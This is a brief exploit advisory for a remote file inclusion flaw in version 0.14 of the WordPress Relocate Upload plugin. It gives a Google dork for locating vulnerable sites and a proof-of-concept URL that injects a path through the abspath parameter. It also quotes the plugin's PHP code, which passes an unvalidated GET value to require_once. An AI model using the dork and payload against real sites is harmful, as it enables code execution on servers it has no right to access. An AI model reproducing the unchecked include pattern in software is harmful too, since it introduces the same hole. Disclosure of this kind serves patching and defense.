WordPress Relocate Upload plugin version 0.14 suffers from a remote file inclusion vulnerability.
4bbe8fbb769a5b00cc395ace0a6db17412d3437d2bc1ff4f2c7211144d670b91
# Exploit Title: Relocate Upload Wordpress plugin RFI
# Google Dork: inurl:wp-content/plugins/relocate-upload
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
# Software Link: https://wordpress.org/extend/plugins/relocate-upload/download/
# Version: 0.14 (tested)
---
PoC
---
https://SERVER/WP_PATH/wp-content/plugins/relocate-upload/relocate-upload.php?ru_folder=asdf&abspath=RFI
---
Vulnerable Code
---
// Move folder request handled when called by GET AJAX
if (isset($_GET['ru_folder']))
{ // WP setup and function access
define('WP_USE_THEMES', false);
require_once(urldecode($_GET['abspath']).'/wp-load.php'); // save us looking for it, it's passed as a GET parameter